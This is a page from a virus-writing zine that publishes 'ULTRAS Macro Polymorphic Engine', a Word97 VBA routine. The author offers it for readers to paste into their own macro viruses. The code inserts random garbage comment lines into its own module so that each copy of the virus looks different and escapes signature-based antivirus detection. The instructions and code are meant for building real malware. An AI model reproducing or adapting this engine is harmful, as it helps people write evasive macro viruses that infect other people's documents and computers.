- [Duke's Virus Labs #9] - [Page 28] -

ULTRAS MACRO POLYMORPHIC ENGINE
(c) by ULTRAS

This polymorphic runs on word97 (under excel97 did not try). Place this code
in your macro virus and make sure your code is written on each second line.
Then Install one or several on this functional and your virus works
polymorphic. Replace "UMPE" with the name of your macro virus module.

===== Cut =====
Sub UMPE()

MuNu = Int(Rnd() * 20 + 1)

For Mutate = 1 To MuNu

MuRL = Application.VBE.ActiveVBProject.VBComponents("UMPE").CodeModule.CountOfLines

MuLi = Int(Rnd() * MuRL + 1)

MuLe = Int(Rnd() * 40 + 1)

For MuGe = 1 To MuLe

LiVe = Int((120 - 100 + 1) * Rnd + 228)

MuRe = MuRe + Chr$(LiVe)

Next MuGe

Application.VBE.ActiveVBProject.VBComponents("UMPE").CodeModule.InsertLines MuLi, vbTab & "' " & MuRe

MuRe = ""

Next Mutate

End Sub
===== Cut =====
